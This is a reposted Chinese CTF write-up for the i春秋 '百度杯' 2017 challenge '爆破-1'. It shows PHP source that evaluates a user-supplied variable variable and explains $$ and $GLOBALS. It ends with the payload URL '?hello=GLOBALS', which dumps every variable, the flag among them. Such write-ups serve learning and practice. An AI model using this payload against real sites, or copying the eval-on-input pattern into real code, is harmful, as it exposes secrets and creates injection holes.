本文主要是介绍i春秋 “百度杯”CTF比赛 2017 二月场 分值:10分 类型:MiscWeb题目名称:爆破-1,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
分值:10分 类型:MiscWeb题目名称:爆破-1
题目内容:
flag就在某六位变量中。
http://c04f614f28694cc1a65e93c5daa3f23ed4c100b475394d01.changame.ichunqiu.com
<?php
include "flag.php"; //包含flag.php文件
$a = @$_REQUEST['hello']; // 请求参数为hello
if(!preg_match('/^\w*$/',$a )){ //从^开头到结尾$ 匹配字符包括下划线\w 匹配字母或数字或下划线或汉字 等价于 ‘[A-Za-z0-9_]’die('ERROR');
}
eval("var_dump($$a);");
show_source(__FILE__);
?>
知识点1:$$
php中的$是可以叠加的
例如:
$a = "b";
$b = "Hello world!";
echo $$a;
结果:
知识点2:超全局变量
$GLOBALS 的作用:引用全局作用域中可用的全部变量,就可以导出所有的变量。
由此可知 GET传参hello,给a赋值,最后输出值。
http://c04f614f28694cc1a65e93c5daa3f23ed4c100b475394d01.changame.ichunqiu.com/?hello=GLOBALS
这篇关于i春秋 “百度杯”CTF比赛 2017 二月场 分值:10分 类型:MiscWeb题目名称:爆破-1的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
